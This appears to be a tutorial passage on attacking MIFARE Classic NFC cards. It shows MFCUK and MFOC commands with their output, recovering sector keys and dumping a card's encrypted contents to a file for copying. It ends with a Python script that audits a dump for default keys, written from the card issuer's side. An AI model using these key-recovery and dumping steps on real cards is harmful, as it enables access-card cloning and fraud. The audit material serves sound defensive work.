MFCUK – MiFare Classic Universal toolKit.
MFCUK can recover a key without knowing any key in advance. In this test, recovering one key took anywhere from a few minutes to a couple of tens of minutes.
ubuntu@ubuntu:~$ sudo mfcuk -C -R 0:A -v 2
INFO: block 3 recovered KEY: 8c9c83f6d192
ubuntu@ubuntu:~$ sudo mfcuk -C -R 0:B -v 2
INFO: block 3 recovered KEY: f4a9ef2afc6d
Sometimes we get a recoverable error, but the decryption process is still fine.
RECOVER: 0mfcuk: ERROR: mfcuk_key_recovery_block() (error code=0x03)
MFOC is an open source implementation of the “offline nested” attack by Nethemba.
If a card uses at least one block encrypted with a default key, all the other keys can be extracted in minutes. If the card does not use default keys, one key for a sector can be retrieved using the MFCUK library, after which this library can be used.
Using the sector keys retrieved with the MFCUK library:
sudo mfoc -k 8c9c83f6d192 -k f4a9ef2afc6d -P 500 -O cardtocopy.dmp
The custom key 0x8c9c83f6d192 has been added to the default keys
The custom key 0xf4a9ef2afc6d has been added to the default keys
ISO/IEC 14443A (106 kbps) target:
ATQA (SENS_RES): 00 04
* UID size: single
* bit frame anticollision supported
UID (NFCID1): 2a e9 0e 52
SAK (SEL_RES): 08
* Not compliant with ISO/IEC 14443-4
* Not compliant with ISO/IEC 18092
The content of the encrypted card is dumped into “cardtocopy.dmp”.
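From the card issuer's side, the default-key condition described above can be checked directly in a dump such as cardtocopy.dmp. The Python script below is an added example, not part of MFOC or MFCUK; it assumes a 1024-byte MIFARE Classic 1K image with key A, access bits and key B stored in each sector trailer, and its default-key list is an illustrative subset.

```python
# Added example (not MFOC/MFCUK code): audit a MIFARE Classic 1K dump.
# Assumes 16 sectors x 4 blocks x 16 bytes, keys present in each trailer.
import sys
BLOCK, BLOCKS_PER_SECTOR, SECTORS = 16, 4, 16

# Widely published default keys (illustrative subset, labels are informal).
DEFAULT_KEYS = {
    "ffffffffffff": "factory transport key",
    "a0a1a2a3a4a5": "MAD key",
    "d3f7d3f7d3f7": "NDEF key",
    "000000000000": "all zeros",
}

def access_bits_valid(ab: bytes) -> bool:
    """Each access-condition nibble is stored once plain and once inverted."""
    c1, c2, c3 = ab[1] >> 4, ab[2] & 0x0F, ab[2] >> 4
    return ((ab[0] & 0x0F) == (c1 ^ 0xF) and (ab[0] >> 4) == (c2 ^ 0xF)
            and (ab[1] & 0x0F) == (c3 ^ 0xF))

def audit_dump(data: bytes) -> list:
    """Return one finding dict per sector that has a weak setting."""
    if len(data) != BLOCK * BLOCKS_PER_SECTOR * SECTORS:
        raise ValueError("not a MIFARE Classic 1K image (expected 1024 bytes)")
    findings = []
    for sector in range(SECTORS):
        start = (sector * BLOCKS_PER_SECTOR + 3) * BLOCK  # trailer = 4th block
        trailer = data[start:start + BLOCK]
        keys = {"A": trailer[0:6].hex(), "B": trailer[10:16].hex()}
        issues = [f"key {slot} is a default ({DEFAULT_KEYS[k]})"
                  for slot, k in keys.items() if k in DEFAULT_KEYS]
        if not access_bits_valid(trailer[6:9]):
            issues.append("access bits fail the inverted-copy check")
        if issues:
            findings.append({"sector": sector, "issues": issues})
    return findings

def build_sample() -> bytes:
    """Constructed sample image: unique keys, except a default key A in sector 5."""
    image = bytearray()
    for sector in range(SECTORS):
        key_a = bytes.fromhex("ffffffffffff") if sector == 5 else bytes([0x11 + sector] * 6)
        key_b = bytes([0x21 + sector] * 6)
        image += bytes(48) + key_a + bytes.fromhex("ff078069") + key_b
    return bytes(image)

if __name__ == "__main__":
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample()
    for f in audit_dump(data):
        print(f"sector {f['sector']:2d}: " + "; ".join(f["issues"]))
```

Any sector it reports with a default key is the foothold the offline nested attack needs, so a clean result requires every sector, including unused ones, to carry a non-default key.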